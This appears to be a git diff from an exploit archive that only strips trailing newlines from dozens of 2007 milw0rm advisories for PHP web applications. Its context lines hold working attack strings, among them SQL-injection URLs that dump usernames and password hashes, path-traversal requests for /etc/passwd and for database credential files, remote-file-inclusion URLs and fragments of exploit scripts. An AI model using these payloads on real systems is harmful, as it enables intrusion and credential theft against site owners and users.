Greetz To: Sniper_Sa & Pal-Hackers & Hack eGy & Dr SeSo & No4Hard & Devil-x & Gold_M -# milw0rm.com [2007-10-28] +# milw0rm.com [2007-10-28] \ No newline at end of file diff --git a/platforms/php/webapps/4585.txt b/platforms/php/webapps/4585.txt index 8ca20a548..195fae925 100755 --- a/platforms/php/webapps/4585.txt +++ b/platforms/php/webapps/4585.txt @@ -16,4 +16,4 @@ inurl:/Generators/Layout_Generator "!new Female Celebrities" inurl:/Generators/Scrollbar_Colors -# milw0rm.com [2007-10-29] +# milw0rm.com [2007-10-29] \ No newline at end of file diff --git a/platforms/php/webapps/4586.txt b/platforms/php/webapps/4586.txt index d63ebf388..01b39940a 100755 --- a/platforms/php/webapps/4586.txt +++ b/platforms/php/webapps/4586.txt @@ -9,4 +9,4 @@ Dorks : "Total Generators & Widgets" "Powered By ProfileCMS v1.0" -# milw0rm.com [2007-10-29] +# milw0rm.com [2007-10-29] \ No newline at end of file diff --git a/platforms/php/webapps/4587.txt b/platforms/php/webapps/4587.txt index 13f0f42fd..9b8676d1d 100755 --- a/platforms/php/webapps/4587.txt +++ b/platforms/php/webapps/4587.txt @@ -37,4 +37,4 @@ http://[site]/[path]/index.php?action=search&where=3&searchGo=1&table=[SQL] http://[site]/[path]/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/* -# milw0rm.com [2007-10-30] +# milw0rm.com [2007-10-30] \ No newline at end of file diff --git a/platforms/php/webapps/4588.txt b/platforms/php/webapps/4588.txt index 9dd9263ea..870373428 100755 --- a/platforms/php/webapps/4588.txt +++ b/platforms/php/webapps/4588.txt @@ -53,4 +53,4 @@ require_once("$dir_ws/urlinn_includes/i_PageSelector.php"); shadow.php0h.com ---------------------------------------------- -# milw0rm.com [2007-10-30] +# milw0rm.com [2007-10-30] \ No newline at end of file diff --git a/platforms/php/webapps/4589.htm b/platforms/php/webapps/4589.htm index cd2182445..d61e7f357 100755 --- a/platforms/php/webapps/4589.htm +++ b/platforms/php/webapps/4589.htm @@ -32,4 +32,4 @@ Admin Exploit -# milw0rm.com [2007-10-30] +# milw0rm.com [2007-10-30] \ No newline at end of file diff --git a/platforms/php/webapps/4591.txt b/platforms/php/webapps/4591.txt index d0fd4752f..0922f81b8 100755 --- a/platforms/php/webapps/4591.txt +++ b/platforms/php/webapps/4591.txt @@ -2,4 +2,4 @@ ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability http://www.sugarforge.org/frs/download.php/1274/install_ModuleBuilderV1.0.zip /modules/Builder/DownloadModule.php?file=../../../../../../../../etc/passwd%00 -# milw0rm.com [2007-10-31] +# milw0rm.com [2007-10-31] \ No newline at end of file diff --git a/platforms/php/webapps/4592.txt b/platforms/php/webapps/4592.txt index 198aff417..5bce69fba 100755 --- a/platforms/php/webapps/4592.txt +++ b/platforms/php/webapps/4592.txt @@ -3,4 +3,4 @@ http://ispworker.de/_files/ispworker-1.21.tar.gz /module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00 /module/ticket/download.php?filename=../../../../../../../../../etc/passwd -# milw0rm.com [2007-10-31] +# milw0rm.com [2007-10-31] \ No newline at end of file diff --git a/platforms/php/webapps/4593.txt b/platforms/php/webapps/4593.txt index 38f8421a6..2b98c8ef6 100755 --- a/platforms/php/webapps/4593.txt +++ b/platforms/php/webapps/4593.txt @@ -48,4 +48,4 @@ Dork: --------------------------------- [http://www.xmors.com ] -------------------------------------- -# milw0rm.com [2007-11-01] +# milw0rm.com [2007-11-01] \ No newline at end of file diff --git a/platforms/php/webapps/4595.txt b/platforms/php/webapps/4595.txt index 9cb6ab0e8..1dabaca40 100755 --- a/platforms/php/webapps/4595.txt +++ b/platforms/php/webapps/4595.txt @@ -51,4 +51,4 @@ line 124 And we got the script path! :P --------------------------------------------------------------- -# milw0rm.com [2007-11-02] +# milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/platforms/php/webapps/4596.txt b/platforms/php/webapps/4596.txt index fdd535d68..474c0820a 100755 --- a/platforms/php/webapps/4596.txt +++ b/platforms/php/webapps/4596.txt @@ -50,4 +50,4 @@ If you insert directory traversal variable in your username, u can save the file where u want ;) --------------------------------------------------------------- -# milw0rm.com [2007-11-02] +# milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/platforms/php/webapps/4597.txt b/platforms/php/webapps/4597.txt index 6361c85c8..888f5e670 100755 --- a/platforms/php/webapps/4597.txt +++ b/platforms/php/webapps/4597.txt @@ -6,4 +6,4 @@ # /auto/glob_new.php?lng=../../../../../../../etc/passwd%00 # /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00 -# milw0rm.com [2007-11-02] +# milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/platforms/php/webapps/4599.txt b/platforms/php/webapps/4599.txt index 88132b577..aa4478c09 100755 --- a/platforms/php/webapps/4599.txt +++ b/platforms/php/webapps/4599.txt @@ -9,4 +9,4 @@ # W w w . T r Y a G . C o m # ################################### -# milw0rm.com [2007-11-02] +# milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/platforms/php/webapps/4602.txt b/platforms/php/webapps/4602.txt index 01d9a4ca4..42e441563 100755 --- a/platforms/php/webapps/4602.txt +++ b/platforms/php/webapps/4602.txt @@ -75,4 +75,4 @@ but GuppY authors didn't patch it :( so you can upload file to -# milw0rm.com [2007-11-03] +# milw0rm.com [2007-11-03] \ No newline at end of file diff --git a/platforms/php/webapps/4603.txt b/platforms/php/webapps/4603.txt index 90cbdf456..24c42e518 100755 --- a/platforms/php/webapps/4603.txt +++ b/platforms/php/webapps/4603.txt @@ -3,4 +3,4 @@ http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2 POC: /categories.php?theme=../../../../../../../../../etc/passwd%00 -# milw0rm.com [2007-11-03] +# milw0rm.com [2007-11-03] \ No newline at end of file diff --git a/platforms/php/webapps/4604.txt b/platforms/php/webapps/4604.txt index 367f8fe41..3a971c142 100755 --- a/platforms/php/webapps/4604.txt +++ b/platforms/php/webapps/4604.txt @@ -3,4 +3,4 @@ http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwiki_beta2.zip POC : /includes/common.php?pathdot=Shell -# milw0rm.com [2007-11-03] +# milw0rm.com [2007-11-03] \ No newline at end of file diff --git a/platforms/php/webapps/4605.txt b/platforms/php/webapps/4605.txt index df897ec24..7160c630d 100755 --- a/platforms/php/webapps/4605.txt +++ b/platforms/php/webapps/4605.txt @@ -34,4 +34,4 @@ Thanks To: str0ke - BiNgZa -# milw0rm.com [2007-11-04] +# milw0rm.com [2007-11-04] \ No newline at end of file diff --git a/platforms/php/webapps/4606.txt b/platforms/php/webapps/4606.txt index 7ec91dd65..f19629128 100755 --- a/platforms/php/webapps/4606.txt +++ b/platforms/php/webapps/4606.txt @@ -2,4 +2,4 @@ nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboard_v0.5.tar.gz /nuboard_v0.5/admin/index.php?site=http://localhost/scripts/020.txt? -# milw0rm.com [2007-11-04] +# milw0rm.com [2007-11-04] \ No newline at end of file diff --git a/platforms/php/webapps/4607.txt b/platforms/php/webapps/4607.txt index c93778181..9931a1d0e 100755 --- a/platforms/php/webapps/4607.txt +++ b/platforms/php/webapps/4607.txt @@ -31,4 +31,4 @@ nirvana_jr,mertcesur,reddevil19,hocam,muhammed4554 WarriorHacker,cepuzmani_53,kalaba,Dr.X,TR4KONYA,X-X-X,daimon ------------------------------------------------------------- -# milw0rm.com [2007-11-04] +# milw0rm.com [2007-11-04] \ No newline at end of file diff --git a/platforms/php/webapps/4608.php b/platforms/php/webapps/4608.php index 58d0e9e95..429287586 100755 --- a/platforms/php/webapps/4608.php +++ b/platforms/php/webapps/4608.php @@ -754,4 +754,4 @@ class phpsploit ?> -# milw0rm.com [2007-11-05] +# milw0rm.com [2007-11-05] \ No newline at end of file diff --git a/platforms/php/webapps/4611.txt b/platforms/php/webapps/4611.txt index a169f0746..fe3ef9470 100755 --- a/platforms/php/webapps/4611.txt +++ b/platforms/php/webapps/4611.txt @@ -19,4 +19,4 @@ value="admin:9b3a80a898fabc984e733d904027cc91" < ----/ to Twoj rezultat wykonan be safe all :) -# milw0rm.com [2007-11-06] +# milw0rm.com [2007-11-06] \ No newline at end of file diff --git a/platforms/php/webapps/4614.txt b/platforms/php/webapps/4614.txt index 64bba5077..287d98fae 100755 --- a/platforms/php/webapps/4614.txt +++ b/platforms/php/webapps/4614.txt @@ -21,4 +21,4 @@ return ''.$r['title'].''; C уважением, Alexsize. -# milw0rm.com [2007-11-09] +# milw0rm.com [2007-11-09] \ No newline at end of file diff --git a/platforms/php/webapps/4617.txt b/platforms/php/webapps/4617.txt index d9cec9645..4bd542a35 100755 --- a/platforms/php/webapps/4617.txt +++ b/platforms/php/webapps/4617.txt @@ -20,4 +20,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-11-11] +# milw0rm.com [2007-11-11] \ No newline at end of file diff --git a/platforms/php/webapps/4618.txt b/platforms/php/webapps/4618.txt index 2fc98f02e..d39ea8457 100755 --- a/platforms/php/webapps/4618.txt +++ b/platforms/php/webapps/4618.txt @@ -29,4 +29,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-11-11] +# milw0rm.com [2007-11-11] \ No newline at end of file diff --git a/platforms/php/webapps/4619.txt b/platforms/php/webapps/4619.txt index c72cccd16..946aea631 100755 --- a/platforms/php/webapps/4619.txt +++ b/platforms/php/webapps/4619.txt @@ -29,4 +29,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-11-11] +# milw0rm.com [2007-11-11] \ No newline at end of file diff --git a/platforms/php/webapps/4620.txt b/platforms/php/webapps/4620.txt index d472b4d29..df2d7ca3f 100755 --- a/platforms/php/webapps/4620.txt +++ b/platforms/php/webapps/4620.txt @@ -21,4 +21,4 @@ # TNX : GOD # ##################################################################################### -# milw0rm.com [2007-11-11] +# milw0rm.com [2007-11-11] \ No newline at end of file diff --git a/platforms/php/webapps/4621.txt b/platforms/php/webapps/4621.txt index c4129d0a2..d92dc76a8 100755 --- a/platforms/php/webapps/4621.txt +++ b/platforms/php/webapps/4621.txt @@ -23,4 +23,4 @@ Vuln code: Exploit: examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php -# milw0rm.com [2007-11-12] +# milw0rm.com [2007-11-12] \ No newline at end of file diff --git a/platforms/php/webapps/4622.txt b/platforms/php/webapps/4622.txt index 7c3c36d4c..d1e11cb06 100755 --- a/platforms/php/webapps/4622.txt +++ b/platforms/php/webapps/4622.txt @@ -36,4 +36,4 @@ GREETZ: milw0rm.com, H4CK-Y0u.org! --==+ Myspace Clone Script SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2007-11-13] +# milw0rm.com [2007-11-13] \ No newline at end of file diff --git a/platforms/php/webapps/4623.txt b/platforms/php/webapps/4623.txt index 3887f8b33..6fd1c5c5a 100755 --- a/platforms/php/webapps/4623.txt +++ b/platforms/php/webapps/4623.txt @@ -25,4 +25,4 @@ http://korban.site/index.php?cm=produk&cp=show&katid=-1/**/union/**/select/**/nu # Komunitas Security dan Hacker Indonesia # dan terkhusus untuk mas ghoz, selamat jalan sahabat|rekan jangan lupakan kami disana, kami selalu menanti kedatangan mas ghoz dengan suka cita :) -# milw0rm.com [2007-11-14] +# milw0rm.com [2007-11-14] \ No newline at end of file diff --git a/platforms/php/webapps/4626.txt b/platforms/php/webapps/4626.txt index f4860928d..117a21af8 100755 --- a/platforms/php/webapps/4626.txt +++ b/platforms/php/webapps/4626.txt @@ -36,4 +36,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2007-11-16] +# milw0rm.com [2007-11-16] \ No newline at end of file diff --git a/platforms/php/webapps/4627.txt b/platforms/php/webapps/4627.txt index 8c2043cd6..e83460bd8 100755 --- a/platforms/php/webapps/4627.txt +++ b/platforms/php/webapps/4627.txt @@ -88,4 +88,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2007-11-16] +# milw0rm.com [2007-11-16] \ No newline at end of file diff --git a/platforms/php/webapps/4628.txt b/platforms/php/webapps/4628.txt index a511c4e5c..d1a15c283 100755 --- a/platforms/php/webapps/4628.txt +++ b/platforms/php/webapps/4628.txt @@ -26,4 +26,4 @@ #Contact : SecReT@SecuRitY.Com.Sa & http://www.sniper-sa.com # #################################################################### -# milw0rm.com [2007-11-16] +# milw0rm.com [2007-11-16] \ No newline at end of file diff --git a/platforms/php/webapps/4629.txt b/platforms/php/webapps/4629.txt index 043890c53..b96c97363 100755 --- a/platforms/php/webapps/4629.txt +++ b/platforms/php/webapps/4629.txt @@ -28,4 +28,4 @@ #Contact : SecReT@SecuRitY.Com.Sa & http://www.sniper-sa.com # #################################################################### -# milw0rm.com [2007-11-16] +# milw0rm.com [2007-11-16] \ No newline at end of file diff --git a/platforms/php/webapps/4630.txt b/platforms/php/webapps/4630.txt index 1a475d20f..1dddf3a26 100755 --- a/platforms/php/webapps/4630.txt +++ b/platforms/php/webapps/4630.txt @@ -45,4 +45,4 @@ Thanks To: str0ke -# milw0rm.com [2007-11-17] +# milw0rm.com [2007-11-17] \ No newline at end of file diff --git a/platforms/php/webapps/4631.txt b/platforms/php/webapps/4631.txt index eb55869ce..42157ea13 100755 --- a/platforms/php/webapps/4631.txt +++ b/platforms/php/webapps/4631.txt @@ -21,4 +21,4 @@ Thanx: ZeberuS - Madtoxic - Deep Emperor and All Netdevilz member =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-11-17] +# milw0rm.com [2007-11-17] \ No newline at end of file diff --git a/platforms/php/webapps/4632.txt b/platforms/php/webapps/4632.txt index ec274175c..629b2e7b4 100755 --- a/platforms/php/webapps/4632.txt +++ b/platforms/php/webapps/4632.txt @@ -52,4 +52,4 @@ Change Admin Password: DevilAuron - http://devilsnight.altervista.org --------------------------------------------------------------------------------------- -# milw0rm.com [2007-11-18] +# milw0rm.com [2007-11-18] \ No newline at end of file diff --git a/platforms/php/webapps/4633.txt b/platforms/php/webapps/4633.txt index f1129c3e5..57c88f601 100755 --- a/platforms/php/webapps/4633.txt +++ b/platforms/php/webapps/4633.txt @@ -30,4 +30,4 @@ GREETZ: milw0rm.com, H4CK-Y0u.org --==+ HotScripts Clone Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-11-18] +# milw0rm.com [2007-11-18] \ No newline at end of file diff --git a/platforms/php/webapps/4634.php b/platforms/php/webapps/4634.php index 5ee611f20..7200e99f2 100755 --- a/platforms/php/webapps/4634.php +++ b/platforms/php/webapps/4634.php @@ -178,4 +178,4 @@ function head() { } ?> -# milw0rm.com [2007-11-18] +# milw0rm.com [2007-11-18] \ No newline at end of file diff --git a/platforms/php/webapps/4635.php b/platforms/php/webapps/4635.php index 81df9016b..9b9e317d5 100755 --- a/platforms/php/webapps/4635.php +++ b/platforms/php/webapps/4635.php @@ -63,4 +63,4 @@ echo "Exploit Has Been Succeful : %s%s \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,path) -# milw0rm.com [2007-11-22] +# milw0rm.com [2007-11-22] \ No newline at end of file diff --git a/platforms/php/webapps/4645.txt b/platforms/php/webapps/4645.txt index f314d4f5a..24f165aea 100755 --- a/platforms/php/webapps/4645.txt +++ b/platforms/php/webapps/4645.txt @@ -40,4 +40,4 @@ Group Site: wWw.XmorS.CoM --==+ Content Injector V1.52 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2007-11-22] +# milw0rm.com [2007-11-22] \ No newline at end of file diff --git a/platforms/php/webapps/4646.pl b/platforms/php/webapps/4646.pl index 89322ab32..043a56b16 100755 --- a/platforms/php/webapps/4646.pl +++ b/platforms/php/webapps/4646.pl @@ -136,4 +136,4 @@ Exploit(); #End #Copyright by $h4d0wl33t 2007 -# milw0rm.com [2007-11-22] +# milw0rm.com [2007-11-22] \ No newline at end of file diff --git a/platforms/php/webapps/4649.txt b/platforms/php/webapps/4649.txt index 931f4aaaa..a2dfe2bb0 100755 --- a/platforms/php/webapps/4649.txt +++ b/platforms/php/webapps/4649.txt @@ -38,4 +38,4 @@ Credits goes to Aria-Security Team Regards, The-0utl4w -# milw0rm.com [2007-11-23] +# milw0rm.com [2007-11-23] \ No newline at end of file diff --git a/platforms/php/webapps/465.pl b/platforms/php/webapps/465.pl index feee44549..f0f89b953 100755 --- a/platforms/php/webapps/465.pl +++ b/platforms/php/webapps/465.pl @@ -62,4 +62,4 @@ close(lo); return; } -# milw0rm.com [2004-09-16] +# milw0rm.com [2004-09-16] \ No newline at end of file diff --git a/platforms/php/webapps/4650.txt b/platforms/php/webapps/4650.txt index 95df70944..70783e94d 100755 --- a/platforms/php/webapps/4650.txt +++ b/platforms/php/webapps/4650.txt @@ -36,4 +36,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2007-11-23] +# milw0rm.com [2007-11-23] \ No newline at end of file diff --git a/platforms/php/webapps/4652.txt b/platforms/php/webapps/4652.txt index 1f42950c7..8fce3f5d3 100755 --- a/platforms/php/webapps/4652.txt +++ b/platforms/php/webapps/4652.txt @@ -36,4 +36,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2007-11-24] +# milw0rm.com [2007-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/4653.txt b/platforms/php/webapps/4653.txt index 995b9e72a..77e7ba744 100755 --- a/platforms/php/webapps/4653.txt +++ b/platforms/php/webapps/4653.txt @@ -28,4 +28,4 @@ http://localhost/events.php?idevent=-1/**/union/**/select/**/version(),2,3,4,1,1 -- // ka0x -# milw0rm.com [2007-11-24] +# milw0rm.com [2007-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/4654.txt b/platforms/php/webapps/4654.txt index 974bb03f5..28bbdd99b 100755 --- a/platforms/php/webapps/4654.txt +++ b/platforms/php/webapps/4654.txt @@ -101,4 +101,4 @@ it.org</textarea> arbitrary operations ;) --> --------------------------------------------------------------- -# milw0rm.com [2007-11-24] +# milw0rm.com [2007-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/4655.txt b/platforms/php/webapps/4655.txt index 3b2e3ece8..5a8173683 100755 --- a/platforms/php/webapps/4655.txt +++ b/platforms/php/webapps/4655.txt @@ -78,4 +78,4 @@ salam untuk: anak-anak jaringan sukabirus, teman-teman di stt telkom, komunitas jasakom, sibalbal, crutz_ao, bidulux, akillers 179........... -# milw0rm.com [2007-11-24] +# milw0rm.com [2007-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/4656.txt b/platforms/php/webapps/4656.txt index 887ad7cb7..e5f9fd772 100755 --- a/platforms/php/webapps/4656.txt +++ b/platforms/php/webapps/4656.txt @@ -75,4 +75,4 @@ AmnPardaz Security Research & Penetration Testing Group WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2007-11-24] +# milw0rm.com [2007-11-24] \ No newline at end of file diff --git a/platforms/php/webapps/4658.php b/platforms/php/webapps/4658.php index 0524612d2..4bc0e755f 100755 --- a/platforms/php/webapps/4658.php +++ b/platforms/php/webapps/4658.php @@ -134,4 +134,4 @@ function sendpacket($packet) -# milw0rm.com [2007-11-25] +# milw0rm.com [2007-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/4659.txt b/platforms/php/webapps/4659.txt index 5bf8bc1cc..e06512333 100755 --- a/platforms/php/webapps/4659.txt +++ b/platforms/php/webapps/4659.txt @@ -214,4 +214,4 @@ Thanks To: str0ke -# milw0rm.com [2007-11-25] +# milw0rm.com [2007-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/4660.pl b/platforms/php/webapps/4660.pl index 14b8f9b46..6fc1d0da1 100755 --- a/platforms/php/webapps/4660.pl +++ b/platforms/php/webapps/4660.pl @@ -120,4 +120,4 @@ print "Enjoy My friend .....\n"; print "\n\nExploiting...\n"; Exploit(); -# milw0rm.com [2007-11-25] +# milw0rm.com [2007-11-25] \ No newline at end of file diff --git a/platforms/php/webapps/4661.py b/platforms/php/webapps/4661.py index f4635be16..c0c2d8e43 100755 --- a/platforms/php/webapps/4661.py +++ b/platforms/php/webapps/4661.py @@ -123,4 +123,4 @@ print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",res conn.close() print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n" -# milw0rm.com [2007-11-26] +# milw0rm.com [2007-11-26] \ No newline at end of file diff --git a/platforms/php/webapps/4662.txt b/platforms/php/webapps/4662.txt index 6fa6949b7..295c09f2a 100755 --- a/platforms/php/webapps/4662.txt +++ b/platforms/php/webapps/4662.txt @@ -56,4 +56,4 @@ http://[target]/[tilde_path]/index.php?search=% 3C&mode=search&sider=on&tss=on&linier=on --------------------------------------------------------------- -# milw0rm.com [2007-11-26] +# milw0rm.com [2007-11-26] \ No newline at end of file diff --git a/platforms/php/webapps/4665.txt b/platforms/php/webapps/4665.txt index 308375412..3b25e6b3f 100755 --- a/platforms/php/webapps/4665.txt +++ b/platforms/php/webapps/4665.txt @@ -55,4 +55,4 @@ MySQL Error: The used SELECT statements have a different number of columns Home > [category_name] > [category_name] > [admin_name]:[admin_hash] --------------------------------------------------------------- -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/4666.txt b/platforms/php/webapps/4666.txt index 0d9d8ee54..08206a3f3 100755 --- a/platforms/php/webapps/4666.txt +++ b/platforms/php/webapps/4666.txt @@ -28,4 +28,4 @@ Get Database Credentials http://[target]/users/files.php?mode=download&file=../../application.php --------------------------------------------------------------- -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/4667.txt b/platforms/php/webapps/4667.txt index 32747ee7b..9da27e57e 100755 --- a/platforms/php/webapps/4667.txt +++ b/platforms/php/webapps/4667.txt @@ -40,4 +40,4 @@ Trick In conf/settings.php there are the database credentials ;) --------------------------------------------------------------- -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/4668.txt b/platforms/php/webapps/4668.txt index ad45890c0..f7beb6141 100755 --- a/platforms/php/webapps/4668.txt +++ b/platforms/php/webapps/4668.txt @@ -88,4 +88,4 @@ taki maly tutek mo¿e sie przydac dla tych co chca cos omijac zablokowanego na Pozdrawiam -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/4669.txt b/platforms/php/webapps/4669.txt index 631dc6bae..8a2f9c128 100755 --- a/platforms/php/webapps/4669.txt +++ b/platforms/php/webapps/4669.txt @@ -9,4 +9,4 @@ http://victim/path/index.php?act=../../../../../../etc/passwd%00 discovered by tomplixsee -# milw0rm.com [2007-11-27] +# milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/platforms/php/webapps/4670.txt b/platforms/php/webapps/4670.txt index a72d43a64..aad075c27 100755 --- a/platforms/php/webapps/4670.txt +++ b/platforms/php/webapps/4670.txt @@ -6,4 +6,4 @@ POC : /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code -# milw0rm.com [2007-11-28] +# milw0rm.com [2007-11-28] \ No newline at end of file diff --git a/platforms/php/webapps/4671.txt b/platforms/php/webapps/4671.txt index e2cde702d..7802fff6a 100755 --- a/platforms/php/webapps/4671.txt +++ b/platforms/php/webapps/4671.txt @@ -29,4 +29,4 @@ Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- -# milw0rm.com [2007-11-28] +# milw0rm.com [2007-11-28] \ No newline at end of file diff --git a/platforms/php/webapps/4672.txt b/platforms/php/webapps/4672.txt index 86f10cc0d..f69b5a495 100755 --- a/platforms/php/webapps/4672.txt +++ b/platforms/php/webapps/4672.txt @@ -29,4 +29,4 @@ Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- -# milw0rm.com [2007-11-28] +# milw0rm.com [2007-11-28] \ No newline at end of file diff --git a/platforms/php/webapps/4674.txt b/platforms/php/webapps/4674.txt index e730a501e..0ad53ecac 100755 --- a/platforms/php/webapps/4674.txt +++ b/platforms/php/webapps/4674.txt @@ -19,4 +19,4 @@ POC: /Evolution1.7/inc/languages_f.php?language=../../../../../../etc/passwd%00 /Evolution1.7/inc/languages.php?language=../../../../../../etc/passwd%00 -# milw0rm.com [2007-11-28] +# milw0rm.com [2007-11-28] \ No newline at end of file diff --git a/platforms/php/webapps/4675.txt b/platforms/php/webapps/4675.txt index 200246b6a..fda6b59e5 100755 --- a/platforms/php/webapps/4675.txt +++ b/platforms/php/webapps/4675.txt @@ -6,4 +6,4 @@ Exploits : /noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd S.P Thanx To : Tryag.Com[Mahmood_ali] -- Asb-May.Net/bb[Mahmood_ali] -# milw0rm.com [2007-11-28] +# milw0rm.com [2007-11-28] \ No newline at end of file diff --git a/platforms/php/webapps/4676.txt b/platforms/php/webapps/4676.txt index 914362e0e..23c9d8b1c 100755 --- a/platforms/php/webapps/4676.txt +++ b/platforms/php/webapps/4676.txt @@ -11,4 +11,4 @@ |Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com | \--------------------------------------------------------------------------/ -# milw0rm.com [2007-11-29] +# milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/php/webapps/4677.txt b/platforms/php/webapps/4677.txt index 3ccbed571..e936ed802 100755 --- a/platforms/php/webapps/4677.txt +++ b/platforms/php/webapps/4677.txt @@ -8,4 +8,4 @@ PoC : /mod/chat/index.php?Root=../../../../../../etc/passwd /mod/chat/index.php?Path=../../../../../../etc/pa -# milw0rm.com [2007-11-29] +# milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/php/webapps/4678.php b/platforms/php/webapps/4678.php index faa0e556d..73e49e0f9 100755 --- a/platforms/php/webapps/4678.php +++ b/platforms/php/webapps/4678.php @@ -105,4 +105,4 @@ function status() { } ?> -# milw0rm.com [2007-11-29] +# milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/php/webapps/4679.txt b/platforms/php/webapps/4679.txt index 4ce28d3dd..41a8f5279 100755 --- a/platforms/php/webapps/4679.txt +++ b/platforms/php/webapps/4679.txt @@ -2,4 +2,4 @@ KML share 1.1 (region.php layer)Remote File Disclosure Vulnerability Script : http://sourceforge.net/project/showfiles.php?group_id=177958 POC : region.php?layer=../../../../../../../etc/passwd%00 -# milw0rm.com [2007-11-29] +# milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/php/webapps/4680.txt b/platforms/php/webapps/4680.txt index 200fa8d42..4d079a61c 100755 --- a/platforms/php/webapps/4680.txt +++ b/platforms/php/webapps/4680.txt @@ -2,4 +2,4 @@ LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd -# milw0rm.com [2007-11-29] +# milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/php/webapps/4681.txt b/platforms/php/webapps/4681.txt index a6aa99db8..1601d4df3 100755 --- a/platforms/php/webapps/4681.txt +++ b/platforms/php/webapps/4681.txt @@ -67,4 +67,4 @@ To add a user... http://localhost/ft/index.php?page=add&loggedin=true -# milw0rm.com [2007-11-29] +# milw0rm.com [2007-11-29] \ No newline at end of file diff --git a/platforms/php/webapps/4684.txt b/platforms/php/webapps/4684.txt index 0eabe6fed..5a7c5fb20 100755 --- a/platforms/php/webapps/4684.txt +++ b/platforms/php/webapps/4684.txt @@ -42,4 +42,4 @@ Thanks To: str0ke -# milw0rm.com [2007-12-01] +# milw0rm.com [2007-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/4685.txt b/platforms/php/webapps/4685.txt index 73ef11056..5e63f1503 100755 --- a/platforms/php/webapps/4685.txt +++ b/platforms/php/webapps/4685.txt @@ -36,4 +36,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2007-12-01] +# milw0rm.com [2007-12-01] \ No newline at end of file diff --git a/platforms/php/webapps/4686.txt b/platforms/php/webapps/4686.txt index 50086db9f..9139eebba 100755 --- a/platforms/php/webapps/4686.txt +++ b/platforms/php/webapps/4686.txt @@ -9,4 +9,4 @@ E-Mail: maku234@gmail.com garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/* garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/* -# milw0rm.com [2007-12-03] +# milw0rm.com [2007-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/4691.txt b/platforms/php/webapps/4691.txt index 184b7aa69..c466f85d3 100755 --- a/platforms/php/webapps/4691.txt +++ b/platforms/php/webapps/4691.txt @@ -85,4 +85,4 @@ Contact: -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2007-12-05] +# milw0rm.com [2007-12-05] \ No newline at end of file diff --git a/platforms/php/webapps/4693.txt b/platforms/php/webapps/4693.txt index 142532f2d..fa61ab6e6 100755 --- a/platforms/php/webapps/4693.txt +++ b/platforms/php/webapps/4693.txt @@ -77,4 +77,4 @@ the pages...then, an attacker 